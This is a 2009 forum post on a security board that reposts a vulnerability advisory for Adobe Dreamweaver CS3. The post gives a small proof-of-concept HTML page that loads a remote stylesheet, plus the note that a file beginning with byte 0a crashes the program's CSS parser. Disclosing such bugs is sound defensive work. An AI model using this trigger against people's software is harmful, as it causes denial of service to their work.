Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things? 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Adobe Dreamweaver CS3 Denial of Service
Posted by: Ivan
Date: April 23, 2009 09:42AM

|| Security Net Advisory #D.02.20.09.a

Title : Adobe Dreamweaver CS3 Denial of Service
Impact : DoS
Type : From remote
Vendor :
- Url : http://www.adobe.com/

|| Vulnerability

Engine for parsing remote CSS files are vulnerable to DoS attacks. Successful exploatation requires from user to include special .css file from remote web site.

|| POC

--- tmpl01.dwbug.php ---
<html>
<head>
<link href="http://security-net.biz/test.css" rel="stylesheet" type="text/css" />
</head>
<body> </body>
</html>
------------------------------

File test.css must begin with hex value: 0a, for successful exploatation.

|| Solution:

Upgrade to newest version.

|| Contact

Author : Ivan Markovic, Network Security Solutions
Original advisory: http://security-net.biz/wsw/index.php?p=259&n=190

http://www.security-net.biz/

Options: ReplyQuote


Sorry, only registered users may post in this forum.